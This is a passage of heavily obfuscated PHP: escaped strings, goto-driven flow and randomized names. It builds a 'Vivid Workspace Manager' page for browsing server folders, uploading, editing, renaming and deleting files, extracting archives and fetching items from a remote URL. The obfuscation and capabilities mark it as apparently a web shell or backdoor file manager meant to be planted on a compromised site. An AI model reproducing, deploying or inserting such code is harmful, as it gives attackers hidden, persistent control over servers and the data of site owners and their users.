6f\x75\x6e\x64\x65\x64\x2d\170\154\40\163\x68\x61\x64\157\x77\55\x78\x6c\x20\167\55\x66\x75\x6c\x6c\x20\155\141\170\x2d\x77\55\63\x78\154\40\164\162\141\156\163\146\x6f\x72\x6d\40\163\x63\141\154\x65\x2d\71\65\x20\166\151\166\x69\144\x2d\x74\162\141\x6e\163\x69\164\151\x6f\156\x22\76\15\xa\x20\40\40\40\x20\40\40\x20\x20\40\40\40\x3c\x68\62\40\143\x6c\141\163\x73\75\x22\164\x65\x78\164\x2d\62\x78\x6c\40\x66\x6f\x6e\164\55\142\x6f\x6c\144\x20\x6d\x62\55\x36\x20\164\145\170\164\55\166\x69\166\x69\x64\55\143\150\x61\x72\143\157\x61\x6c\42\76\105\x64\151\x74\40\111\x74\x65\155\74\57\x68\x32\x3e\15\xa\x20\40\x20\40\x20\40\x20\40\x20\40\x20\40\x3c\x66\x6f\x72\x6d\40\x69\144\x3d\x22\145\144\x69\x74\106\x6f\x72\x6d\42\x20\155\145\x74\x68\157\144\x3d\42\x70\157\x73\164\x22\76\xd\xa\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\40\x3c\151\x6e\160\165\x74\40\164\171\160\x65\x3d\42\x68\151\x64\x64\x65\x6e\42\40\156\141\155\x65\75\x22\x63\163\x72\x66\x5f\164\157\153\145\156\x22\40\166\x61\154\165\x65\x3d\42"; goto VWIgh; nbZmL: $eiAOI = "\106\141\x69\154\x65\x64\40\x74\x6f\x20\x63\162\x65\x61\x74\x65\x20\146\x69\154\x65\56"; goto ohjk6; f24AN: $eiAOI = "\x45\162\x72\157\x72\x20\145\x78\164\x72\141\x63\164\151\x6e\147\40\x61\162\x63\150\x69\166\x65\x2e"; goto lNYcX; CW41u: if (move_uploaded_file($cfUXs["\164\x6d\160\137\156\x61\155\x65"], $lr3uS)) { goto QLUbV; } goto kW40Z; FDu42: if (mkdir($iMsFn, 0755)) { goto j7_2l; } goto DCvSp; KShTY: $amcpK = true; goto Iat4i; qg9wb: echo "\x22\76\xd\xa\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\74\151\x6e\160\165\x74\40\164\171\160\x65\75\x22\150\151\x64\144\x65\x6e\x22\x20\151\x64\x3d\x22\x6f\162\151\x67\x69\x6e\x61\154\111\x74\x65\x6d\x4e\141\x6d\145\42\40\x6e\141\155\145\75\x22\x6f\162\151\147\x69\156\x61\x6c\137\156\x61\x6d\x65\x22\76\15\xa\40\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\40\x20\40\x3c\151\x6e\160\165\x74\x20\x74\171\x70\x65\75\x22\x74\x65\x78\x74\x22\x20\x69\144\75\42\x6e\145\167\x49\x74\x65\x6d\116\141\x6d\x65\42\40\x6e\x61\x6d\x65\75\42\x6e\x65\x77\137\156\x61\x6d\x65\42\x20\x63\154\x61\x73\163\x3d\x22\x77\x2d\x66\165\x6c\154\x20\x70\55\x33\40\142\x6f\x72\x64\x65\162\x20\x72\x6f\165\156\144\x65\144\x2d\x6c\x67\x20\155\x62\55\x36\40\x66\x6f\143\x75\x73\72\157\165\x74\x6c\151\x6e\145\x2d\156\157\x6e\x65\x20\146\157\143\165\163\72\162\x69\156\147\x2d\62\x20\x66\157\143\165\x73\x3a\x72\151\x6e\147\x2d\x76\x69\x76\x69\x64\x2d\164\x65\x61\154\x22\x20\162\x65\161\x75\151\162\x65\144\76\15\12\40\x20\x20\40\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\x3c\144\x69\x76\40\143\154\141\163\x73\75\x22\146\154\x65\170\x20\152\x75\163\164\x69\146\171\55\145\156\x64\40\x73\x70\x61\143\x65\55\170\55\63\42\x3e\xd\xa\40\x20\40\x20\x20\40\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x3c\142\165\x74\164\x6f\156\40\164\171\160\x65\x3d\42\x73\165\142\x6d\x69\x74\42\x20\156\141\x6d\x65\75\42\x72\145\156\141\x6d\x65\x5f\151\164\x65\155\42\x20\x63\154\141\x73\163\x3d\x22\x62\147\x2d\147\x72\x65\145\x6e\x2d\x35\60\x30\x20\x74\145\x78\164\x2d\167\150\151\164\x65\40\160\x78\x2d\x35\40\160\x79\x2d\62\x20\x72\x6f\x75\156\x64\145\144\55\154\x67\40\x68\x6f\x76\145\x72\x3a\x62\x67\x2d\147\x72\x65\145\x6e\55\x36\x30\x30\40\166\x69\166\151\144\55\x74\162\x61\156\163\x69\164\151\157\x6e\42\x3e\123\x61\166\x65\74\57\x62\165\164\x74\157\x6e\76\xd\xa\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\40\x3c\x62\165\164\164\157\x6e\x20\x74\x79\160\145\x3d\x22\142\x75\x74\x74\157\156\x22\40\157\x6e\x63\x6c\151\x63\153\75\x22\x63\154\157\163\x65\104\151\141\x6c\157\x67\50\x27\x72\x65\156\141\155\145\x44\x69\141\154\x6f\x67\x27\x29\42\40\x63\154\x61\x73\x73\75\x22\x62\x67\55\x67\162\x61\x79\55\x35\60\x30\x20\164\x65\170\x74\55\x77\x68\151\x74\145\40\x70\x78\x2d\x35\x20\x70\x79\x2d\62\x20\x72\x6f\x75\156\x64\145\144\x2d\x6c\147\40\x68\157\166\145\162\x3a\x62\x67\x2d\147\162\x61\171\55\66\60\x30\40\x76\x69\166\151\144\55\x74\162\x61\156\x73\151\x74\151\x6f\x6e\42\x3e\x43\141\x6e\x63\145\x6c\74\x2f\142\165\x74\x74\x6f\156\x3e\15\xa\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\144\x69\x76\x3e\15\12\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x3c\x2f\146\157\x72\155\x3e\15\12\40\40\40\x20\x20\40\40\40\74\57\x64\x69\x76\x3e\15\12\40\40\x20\x20\74\57\x64\x69\x76\76\xd\xa\15\xa\40\x20\40\40\x3c\x73\143\x72\x69\160\x74\76\15\12\x20\40\x20\x20\40\x20\40\x20\146\165\156\x63\x74\151\x6f\x6e\40\145\144\x69\x74\111\164\x65\x6d\50\151\164\145\x6d\116\x61\x6d\x65\51\x20\173\xd\12\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\40\146\x65\164\x63\150\x28\x27\x3f\x77\x6f\x72\x6b\x73\x70\x61\143\x65\75"; goto GyKT_; Oauf3: if (!isset($eiAOI)) { goto h0yTr; } goto VmcMU; QAJQZ: echo "\xd\xa\x3c\x21\104\x4f\x43\124\x59\x50\105\40\x68\164\x6d\x6c\x3e\xd\12\x3c\x68\164\x6d\154\40\x6c\141\156\147\x3d\x22\x65\156\x22\x3e\15\xa\74\x68\x65\x61\144\x3e\15\12\40\40\40\40\74\x6d\x65\x74\x61\x20\143\x68\x61\x72\163\145\x74\75\42\125\x54\106\55\70\x22\x3e\15\xa\40\x20\40\x20\x3c\x6d\x65\x74\141\40\x6e\x61\x6d\x65\x3d\42\x76\x69\x65\x77\160\157\162\x74\42\40\x63\x6f\156\164\x65\156\164\75\42\167\151\x64\x74\150\75\x64\x65\x76\x69\x63\145\x2d\167\151\144\x74\x68\x2c\x20\x69\x6e\151\x74\x69\x61\x6c\55\163\143\x61\154\145\x3d\x31\56\x30\x22\x3e\xd\12\40\40\x20\x20\x3c\x74\x69\164\x6c\x65\x3e\126\x69\166\151\x64\40\x57\157\162\153\163\x70\x61\x63\145\40\115\141\156\x61\147\x65\x72\74\x2f\x74\151\x74\x6c\145\76\xd\12\x20\x20\40\40\74\163\x63\x72\x69\x70\x74\40\163\x72\x63\x3d\x22\150\164\164\160\163\x3a\x2f\x2f\143\x64\x6e\56\x74\x61\x69\x6c\x77\x69\x6e\x64\143\163\163\x2e\x63\157\x6d\42\76\x3c\x2f\163\x63\162\x69\x70\x74\76\15\xa\40\x20\40\40\74\163\x63\x72\x69\160\x74\40\x73\162\143\75\x22\x68\x74\164\160\163\x3a\57\57\153\x69\x74\56\146\x6f\156\x74\141\x77\x65\163\x6f\155\x65\x2e\143\157\x6d\57\x61\60\67\x36\x64\x30\x35\63\71\x39\x2e\x6a\163\42\x20\143\x72\x6f\163\x73\x6f\x72\151\x67\x69\x6e\x3d\x22\x61\x6e\157\x6e\x79\155\x6f\x75\163\x22\76\x3c\57\163\143\x72\x69\160\164\76\xd\xa\40\40\40\x20\x3c\x73\164\171\154\145\x3e\xd\12\x20\40\40\x20\x20\40\x20\x20\56\142\x67\55\166\151\166\151\x64\x2d\163\x6c\x61\164\145\x20\173\40\142\141\x63\x6b\x67\x72\157\165\156\x64\55\x63\x6f\154\157\162\x3a\40\x23\145\x32\x65\x38\x66\x30\73\40\175\15\xa\x20\40\x20\40\40\40\x20\40\56\142\x67\x2d\x76\151\x76\x69\x64\x2d\164\145\141\x6c\x20\x7b\x20\x62\141\x63\x6b\x67\x72\x6f\x75\156\144\x2d\x63\157\154\157\x72\x3a\x20\x23\x31\x34\142\x38\141\66\x3b\40\175\15\12\40\x20\x20\40\x20\x20\x20\40\56\x62\x67\x2d\x76\151\166\151\144\x2d\x74\x65\x61\x6c\x2d\x64\141\162\x6b\40\x7b\40\x62\141\x63\x6b\147\x72\x6f\165\156\x64\x2d\x63\157\154\x6f\162\x3a\x20\43\60\146\67\66\x36\x65\x3b\x20\175\xd\12\x20\40\40\x20\x20\40\40\x20\56\x74\145\170\x74\x2d\166\x69\166\x69\x64\55\x63\x68\x61\x72\143\x6f\x61\154\40\173\40\x63\x6f\154\x6f\x72\72\40\43\x31\61\x31\70\62\x37\x3b\40\175\xd\xa\40\40\40\x20\40\40\40\x20\x2e\x76\x69\166\x69\x64\x2d\164\x72\141\x6e\163\151\164\151\157\156\x20\x7b\x20\x74\x72\x61\156\x73\x69\164\x69\157\x6e\72\40\141\154\x6c\x20\x30\56\x33\163\x20\145\141\x73\145\x2d\151\x6e\55\x6f\x75\164\73\40\175\15\xa\x20\x20\40\x20\40\x20\40\40\56\x76\151\x76\151\x64\x2d\x68\x6f\x76\145\x72\x20\173\40\164\x72\x61\x6e\163\151\164\151\x6f\156\x3a\40\164\162\x61\x6e\163\x66\x6f\162\155\40\60\x2e\x32\x73\54\x20\142\157\170\x2d\x73\x68\141\x64\157\167\x20\x30\56\x32\x73\73\x20\175\15\12\40\x20\40\40\40\x20\40\40\x2e\166\x69\x76\x69\x64\x2d\x68\157\166\145\x72\x3a\150\157\166\145\x72\x20\173\40\x74\162\141\x6e\163\146\157\x72\155\x3a\x20\164\x72\141\156\163\x6c\x61\164\145\x59\50\55\62\x70\170\51\x3b\x20\142\157\x78\55\163\x68\141\x64\157\x77\x3a\x20\60\x20\64\160\170\40\66\160\x78\x20\162\147\142\x61\x28\x30\54\x20\x30\x2c\40\x30\x2c\x20\x30\56\x31\51\x3b\x20\175\15\12\x20\40\40\x20\x20\40\40\40\x2e\163\x74\151\x63\153\x79\55\x68\145\x61\x64\145\162\x20\164\x68\x20\x7b\x20\x70\157\163\151\x74\x69\157\156\72\40\163\x74\x69\x63\153\171\73\40\x74\x6f\x70\72\x20\x30\x3b\40\x62\x61\143\x6b\x67\162\157\x75\156\144\72\40\x23\146\x33\x66\64\x66\x36\73\x20\x7a\x2d\x69\x6e\144\145\170\x3a\x20\61\60\73\x20\175\15\12\x20\x20\x20\40\x3c\x2f\x73\164\171\x6c\x65\x3e\15\12\x3c\x2f\x68\145\141\144\x3e\15\12\x3c\142\157\x64\x79\40\x63\x6c\x61\x73\x73\75\x22\x62\x67\x2d\166\151\x76\x69\144\x2d\163\154\x61\x74\145\40\x6d\151\156\x2d\150\x2d\163\x63\x72\145\145\x6e\42\76\15\12\40\40\x20\40\x3c\x64\151\x76\40\x63\154\141\163\x73\75\42\143\x6f\x6e\164\x61\151\156\x65\x72\x20\x6d\170\55\141\x75\x74\x6f\x20\x70\x2d\x36\x22\76\xd\xa\x20\40\x20\40\40\x20\x20\40\x3c\x68\x31\x20\143\154\x61\163\x73\75\x22\x74\145\x78\164\x2d\x34\x78\154\x20\146\x6f\x6e\x74\55\x62\157\x6c\144\x20\x6d\142\x2d\70\x20\x74\145\x78\164\55\x76\x69\166\x69\144\55\x63\150\x61\x72\143\157\141\x6c\x22\x3e\126\x69\x76\x69\x64\x20\127\x6f\162\153\x73\160\141\x63\145\40\x4d\141\156\141\147\x65\162\74\x2f\150\61\76\xd\xa\xd\xa\x20\40\x20\x20\40\40\40\40\x3c\41\x2d\x2d\40\120\141\164\150\40\103\x72\165\x6d\x62\163\40\x2d\55\76\xd\xa\40\40\40\40\40\x20\x20\x20\74\156\141\x76\x20\x63\154\x61\163\163\75\x22\x6d\x62\55\x36\40\164\145\x78\x74\x2d\x6c\x67\40\x66\154\x65\x78\40\151\164\145\155\163\x2d\x63\x65\x6e\x74\145\x72\42\76"; goto LXLT8; uV7Wv: session_start(); goto scsPE; rbPq3: sDjej: goto zkyUf; X8cY8: SY6Uz: goto mjbm2; aceKt: foreach ($TE33v as $GoiE6) { goto oBPZf; thKmS: echo is_writable($JuXLO . "\57" . $GoiE6) ? "\131\145\x73" : "\x4e\x6f"; goto LVZXP; gTDtp: echo htmlspecialchars($GoiE6); goto fonvw; oBPZf: echo "\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\x20\x3c\x74\162\40\143\154\141\163\x73\75\42\142\x6f\x72\144\x65\162\x2d\164\40\150\157\166\x65\162\72\142\147\55\147\x72\x61\x79\x2d\65\60\40\166\151\x76\x69\144\55\x74\x72\141\x6e\163\x69\164\151\x6f\156\x22\x3e\15\xa\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\x3c\x74\x64\x20\143\x6c\x61\x73\x73\x3d\42\160\55\64\x22\x3e\x3c\151\40\x63\154\141\x73\x73\75\x22\x66\x61\163\x20\146\x61\x2d\x66\x6f\154\x64\x65\x72\40\155\162\x2d\x32\x20\x74\x65\x78\x74\x2d\x76\x69\166\151\x64\x2d\164\145\141\154\x22\x3e\74\57\x69\76\74\141\40\x68\162\145\146\75\x22\77\167\157\x72\x6b\163\160\x61\143\x65\x3d"; goto Z5P6z; dQlAu: echo "\47\x29\x22\x20\143\x6c\141\x73\163\x3d\x22\x62\147\55\x79\x65\x6c\154\157\x77\55\65\60\60\x20\x74\x65\170\164\x2d\167\150\151\x74\145\x20\x70\x78\55\63\x20\x70\x79\55\x31\x20\x72\x6f\x75\x6e\144\145\144\55\x6c\x67\40\150\x6f\x76\x65\162\72\142\x67\55\171\x65\154\x6c\157\x77\55\x36\x30\60\40\x76\151\166\151\144\55\164\162\141\156\163\x69\164\151\157\x6e\42\76\x52\145\156\x61\x6d\x65\x3c\x2f\x62\165\164\x74\x6f\156\76\15\12\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x20\40\40\x20\40\x20\x3c\142\x75\x74\x74\x6f\156\x20\157\156\143\x6c\151\143\x6b\75\42\143\157\156\x66\x69\162\155\x44\x65\x6c\145\x74\145\x28\47"; goto nfZOR; WXIoG: echo date("\x59\55\155\x2d\x64\x20\110\x3a\151\x3a\163", filemtime($JuXLO . "\57" . $GoiE6)); goto PJI6v; fonvw: echo "\74\57\x61\76\x3c\57\164\x64\76\15\12\40\40\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x3c\164\144\x20\x63\154\x61\x73\163\x3d\x22\160\x2d\64\42\x3e\x46\x6f\x6c\x64\x65\x72\74\x2f\164\144\76\xd\12\40\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\40\40\40\40\40\40\40\x20\74\x74\144\x20\x63\154\141\163\x73\75\x22\x70\55\64\x22\76\x2d\74\x2f\x74\144\x3e\15\12\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\74\164\x64\x20\x63\154\x61\x73\163\x3d\42\x70\x2d\x34\42\76"; goto thKmS; LVZXP: echo "\x3c\x2f\164\x64\x3e\xd\12\x20\x20\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\40\40\40\40\40\x20\40\x20\40\40\40\40\40\x20\x3c\164\144\40\x63\154\141\x73\x73\x3d\x22\x70\55\64\x22\76"; goto WXIoG; PJI6v: echo "\x3c\57\x74\x64\x3e\15\12\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40\40\x3c\x74\144\40\x63\x6c\x61\x73\x73\x3d\42\160\x2d\64\40\x73\x70\x61\x63\x65\55\x78\x2d\x33\x22\x3e\15\xa\40\x20\x20\x20\40\x20\40\x20\x20\40\40\40\x20\40\40\40\x20\40\40\x20\40\40\x20\40\40\40\40\x20\40\40\40\40\74\x62\165\164\164\157\x6e\40\x6f\156\143\x6c\x69\x63\153\x3d\x22\157\x70\145\x6e\x52\145\156\141\x6d\145\104\x69\141\154\157\x67\50\x27"; goto A1kPw; t2u1T: vDlvx: goto UrB4A; A1kPw: echo htmlspecialchars($GoiE6); goto dQlAu; nfZOR: echo htmlspecialchars($GoiE6); goto DNElF; Z5P6z: echo urlencode($JuXLO . "\57" . $GoiE6); goto wCTEr; wCTEr: echo "\42\40\x63\x6c\x61\x73\x73\x3d\x22\x74\145\x78\x74\55\x76\x69\166\151\144\x2d\164\145\x61\154\40\x68\x6f\166\x65\x72\72\165\156\x64\145\162\x6c\x69\156\x65\x22\76"; goto gTDtp; DNElF: echo "\47\x29\42\x20\x63\x6c\141\163\163\75\x22\142\x67\x2d\x72\x65\144\55\65\x30\x30\x20\164\x65\170\x74\55\x77\x68\151\x74\145\40\x70\x78\55\63\40\x70\x79\x2d\61\x20\x72\157\x75\x6e\x64\x65\144\x2d\x6c\147\40\x68\x6f\166\145\x72\x3a\x62\147\55\x72\145\144\55\x36\x30\60\x20\166\151\166\x69\144\55\164\x72\x61\x6e\163\151\x74\x69\x6f\156\42\76\104\x65\x6c\x65\164\145\74\x2f\x62\x75\x74\x74\x6f\x6e\x3e\xd\xa\40\40\x20\x20\40\x20\40\x20\x20\40\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\74\57\x74\144\x3e\15\xa\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\40\x20\40\40\40\x3c\57\x74\x72\76\15\xa\40\40\x20\40\40\40\40\x20\x20\40\40\x20\40\x20\x20\40\40\40\x20\x20"; goto t2u1T; UrB4A: } goto rbPq3; d4_Jm: $eiAOI = "\106\x69\x6c\145\x20\x64\145\x6c\x65\164\145\144\40\x73\x75\x63\x63\x65\163\163\146\x75\x6c\154\x79\56"; goto TZ05N; Prxuo: goto aJD3o; goto IWx7T; rYnCk: B9wqc: goto ucjul; ZdZbN: Iu0FK: goto qaBqR; lWotz: aFuw8: goto mmv7q; YLeKk: echo "\x20\x20\x20\x20\40\40\40\x20\40\40\40\40\x20\x20\x20\40\x3c\144\151\166\40\143\154\x61\x73\163\75\x22\x62\x67\x2d\x77\x68\151\164\x65\x20\x70\55\66\40\162\157\x75\x6e\x64\x65\144\55\x78\154\x20\x73\x68\141\144\x6f\x77\x2d\170\154\40\x76\151\x76\151\x64\x2d\150\157\166\x65\x72\42\76\15\12\x20\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x3c\x68\x33\40\x63\x6c\141\163\x73\x3d\x22\164\x65\x78\x74\x2d\170\154\x20\x66\157\156\x74\55\163\145\x6d\151\142\157\x6c\144\x20\155\142\55\x34\40\x74\x65\170\164\55\x76\151\166\x69\144\x2d\143\x68\141\162\143\x6f\x61\x6c\x22\x3e\106\x65\164\x63\150\40\122\145\155\157\164\x65\x20\111\164\145\155\74\x2f\x68\x33\x3e\xd\12\40\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\74\146\x6f\162\x6d\x20\x6d\x65\x74\150\x6f\144\75\42\160\x6f\x73\164\42\x20\143\154\x61\x73\163\x3d\42\x66\154\x65\170\x20\x73\x70\141\143\145\x2d\170\55\63\x22\x3e\xd\xa\x20\40\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\40\74\x69\x6e\x70\165\x74\40\164\x79\160\x65\x3d\42\150\151\x64\144\145\156\x22\x20\156\x61\155\145\x3d\x22\x63\x73\162\146\137\164\x6f\x6b\145\156\x22\40\x76\x61\x6c\165\x65\x3d\x22"; goto AFPJJ; Xm9a5: function yWKTb($s4K3c, $EOGAw) { goto eQmAu; Aldr6: se0PQ: goto gwwUj; KMNvl: $uDMeK = substr($s4K3c, strlen($EOGAw)); goto Agsz6; ExiWm: $L2wIb = []; goto QQE8L; Agsz6: $coEZy = array_filter(explode(DIRECTORY_SEPARATOR, $uDMeK)); goto ExiWm; nBZI2: foreach ($coEZy as $yGFOx) { goto HyqUj; aAezV: if (is_dir($z0WlH) && is_readable($z0WlH)) { goto n1Zbs; } goto Vnd3p; SPQpR: n1Zbs: goto UQ22U; gi2zQ: goto EHq0L; goto SPQpR; Dw96L: EHq0L: goto Ljazt; Ljazt: y3Tdv: goto uOD8T; HyqUj: $z0WlH .= DIRECTORY_SEPARATOR . $yGFOx; goto aAezV; Vnd3p: $L2wIb[] = "\74\x73\x70\141\156\40\x63\x6c\141\x73\163\75\42\x74\x65\170\x74\x2d\147\162\x61\x79\x2d\65\x30\60\x22\x3e" . htmlspecialchars($yGFOx) . "\x3c\x2f\x73\x70\x61\x6e\76"; goto gi2zQ; UQ22U: $L2wIb[] = "\x3c\141\40\150\162\145\x66\75\x22\x3f\167\x6f\x72\153\163\x70\x61\143\x65\x3d" . urlencode($z0WlH) . "\42\x20\x63\x6c\141\163\163\75\x22\164\x65\x78\164\x2d\166\151\x76\x69\144\55\164\145\141\154\x20\x68\x6f\166\x65\162\72\165\x6e\144\x65\162\154\151\156\145\x22\x3e" . htmlspecialchars($yGFOx) . "\74\x2f\x61\76"; goto Dw96L; uOD8T: } goto Aldr6; OIOr1: $L2wIb[] = "\x3c\x61\x20\x68\162\145\146\x3d\42\77\167\157\162\153\x73\160\141\143\145\75" . urlencode($EOGAw) . "\x22\x20\x63\154\x61\x73\163\x3d\42\x74\x65\170\x74\55\166\x69\166\x69\144\x2d\x74\145\141\154\x20\x68\157\x76\x65\x72\72\x75\x6e\144\x65\x72\154\151\156\x65\x20\146\157\x6e\x74\55\x73\x65\x6d\x69\x62\157\x6c\x64\x22\x3e\x52\157\157\x74\x3c\57\141\76"; goto nBZI2; nQXNR: DoLMo: goto KMNvl; QQE8L: $z0WlH = $EOGAw; goto OIOr1; LldjR: return "\74\163\x70\141\x6e\x20\143\154\141\x73\x73\x3d\x22\164\145\170\164\x2d\162\x65\144\55\65\60\x30\42\x3e\111\x6e\166\141\154\151\x64\40\x70\141\x74\x68\x3c\57\x73\160\x61\x6e\x3e"; goto nQXNR; gwwUj: return implode("\40\x3c\163\x70\x61\156\40\x63\154\x61\163\163\75\x22\164\x65\170\164\55\x76\151\x76\151\144\x2d\x63\150\141\162\143\x6f\x61\x6c\40\155\170\55\x31\42\x3e\57\74\57\x73\160\x61\x6e\76\x20", $L2wIb); goto pk9Ub; eQmAu: if (!(strpos($s4K3c, $EOGAw) !== 0)) { goto DoLMo; } goto LldjR; pk9Ub: } goto Vq2jx; vHRRX: echo htmlspecialchars($_SESSION["\x63\x73\162\146\x5f\x74\157\153\x65\156"]); goto qg9wb; OMTJJ: LHd39: goto dN69I; m7My9: $w529N = Z2HHU($_POST["\x69\164\x65\155\137\x6e\x61\x6d\145"]); goto hp08D; mv3fz: goto QIaBt; goto jwZBq; QB1uP: if (!(!isset($_SESSION["\163\x65\x63\165\162\x65\x5f\x73\145\163\163\x69\157\156"]) || $_SESSION["\163\x65\x63\x75\162\x65\137\163\145\x73\x73\151\157\156"] !== true)) { goto UGz2B; } goto cpCFu; WTtVL: uxbHB: goto boWew; URoB1: goto cEO_N; goto ZWGAW; GEfsm: HQ9s7: goto GFEw2; Wgxgp: $eiAOI = "\106\x69\x6c\x65\x20\x6e\157\x74\40\x66\x6f\165\156\144\x20\157\x72\40\x6e\x6f\x74\x20\167\x72\151\x74\x61\x62\x6c\145\56"; goto Jwan3; gB7S4: echo "\x22\76\15\12\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\40\40\x20\74\151\x6e\x70\x75\x74\40\164\171\160\145\75\x22\164\x65\170\x74\42\40\156\x61\x6d\145\x3d\42\146\x6f\154\x64\x65\x72\137\x6e\x61\x6d\x65\42\x20\x63\x6c\x61\163\163\x3d\x22\146\154\x65\x78\55\x31\x20\x70\x2d\63\x20\x62\x6f\x72\x64\145\162\40\x72\x6f\x75\156\x64\145\x64\55\154\147\40\146\x6f\x63\165\x73\x3a\157\165\x74\x6c\x69\156\145\55\x6e\157\156\x65\40\146\x6f\x63\x75\163\72\x72\x69\156\147\x2d\x32\40\146\x6f\x63\x75\163\72\162\x69\156\x67\x2d\x76\x69\166\151\x64\55\164\145\x61\x6c\42\40\160\x6c\141\143\x65\x68\157\154\x64\145\x72\x3d\42\x46\157\x6c\x64\145\162\x20\x6e\x61\x6d\145\42\x20\162\145\x71\165\x69\x72\x65\144\x3e\15\12\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\40\74\x62\165\164\164\157\156\40\x74\171\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\40\156\x61\155\145\75\42\141\x64\x64\137\144\x69\x72\x65\x63\x74\157\x72\171\42\x20\x63\154\141\x73\163\x3d\42\x62\147\x2d\166\151\x76\x69\x64\55\164\145\141\154\40\164\x65\x78\x74\x2d\x77\x68\x69\164\x65\40\160\x2d\63\x20\162\x6f\165\156\144\x65\x64\x2d\154\x67\40\x68\157\x76\145\162\72\x62\147\55\x76\151\166\151\x64\x2d\x74\145\x61\x6c\55\x64\141\x72\153\40\166\x69\x76\x69\x64\x2d\x74\162\x61\156\163\151\x74\151\157\x6e\x22\x3e\101\x64\x64\x3c\x2f\142\x75\x74\164\x6f\x6e\x3e\15\12\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x3c\57\146\x6f\162\155\x3e\xd\xa\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\74\x2f\x64\x69\166\x3e\xd\12\xd\xa\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x3c\41\55\x2d\40\125\x70\154\157\x61\144\40\x49\164\145\155\40\55\x2d\x3e\15\xa\x20\40\x20\40\40\x20\x20\40\40\40\x20\x20\x3c\144\x69\166\x20\x63\x6c\141\163\163\x3d\42\x62\x67\55\x77\150\151\x74\x65\40\160\x2d\66\x20\162\157\165\x6e\144\x65\x64\55\170\154\40\x73\150\x61\144\x6f\167\x2d\170\x6c\x20\166\151\x76\151\144\55\x68\157\166\x65\x72\x22\76\xd\12\x20\40\x20\x20\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\x3c\x68\x33\40\143\154\x61\x73\163\75\x22\x74\x65\170\164\x2d\x78\x6c\40\x66\x6f\156\164\55\163\x65\155\x69\142\157\x6c\144\40\155\142\55\x34\x20\164\x65\x78\164\x2d\x76\x69\166\x69\144\x2d\x63\x68\141\162\x63\x6f\141\x6c\42\76\x55\x70\x6c\x6f\x61\x64\x20\111\x74\x65\x6d\74\x2f\x68\63\76\15\xa\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x3c\146\x6f\x72\x6d\40\x6d\x65\x74\x68\x6f\x64\75\x22\160\x6f\163\x74\42\x20\x65\x6e\143\164\x79\160\x65\75\x22\x6d\165\154\164\x69\x70\x61\162\x74\x2f\x66\x6f\162\155\x2d\x64\141\x74\x61\42\x20\143\x6c\x61\163\163\75\x22\x66\154\x65\x78\x20\163\160\x61\x63\145\55\x78\x2d\63\x22\76\15\xa\40\40\40\x20\40\40\40\x20\40\40\x20\x20\40\40\40\x20\x20\x20\40\x20\74\x69\156\x70\165\164\40\x74\171\160\145\x3d\42\150\x69\144\144\145\x6e\x22\x20\156\x61\155\145\x3d\x22\x63\163\162\146\x5f\x74\x6f\153\x65\156\42\40\x76\x61\x6c\165\x65\75\x22"; goto xIfK4; FkN5Q: PVkxQ: goto o68Gz; DCvSp: $eiAOI = "\106\141\x69\x6c\145\x64\x20\164\x6f\40\x63\162\x65\141\x74\145\x20\x66\x6f\154\x64\x65\x72\56"; goto Prxuo; AMRV8: if (!($amcpK && isset($_POST["\146\145\164\x63\x68\x5f\x72\x65\155\x6f\164\145"]) && !empty($_POST["\162\x65\155\157\x74\145\x5f\165\x72\x6c"]))) { goto ObQSB; } goto iniOU; SN9cU: $eiAOI = "\x46\x69\154\145\40\141\154\x72\x65\x61\x64\171\x20\x65\170\x69\x73\x74\163\56"; goto gy4jB; xbvpN: wo1el: goto CLrF3; dN69I: $lr3uS = $JuXLO . "\x2f" . z2HHu($cfUXs["\156\141\155\x65"]); goto J9lCy; JaY03: if (!($_SERVER["\x52\105\121\x55\105\x53\124\137\115\105\124\x48\117\104"] === "\x50\x4f\x53\x54" && isset($_POST["\x63\x73\x72\x66\137\164\157\x6b\x65\x6e"]) && $_POST["\143\163\x72\x66\137\164\x6f\x6b\145\x6e"] === $_SESSION["\x63\163\162\x66\x5f\x74\157\x6b\x65\x6e"])) { goto tO2pF; } goto R7lg1; gy4jB: goto EQeRN; goto iAPRi; 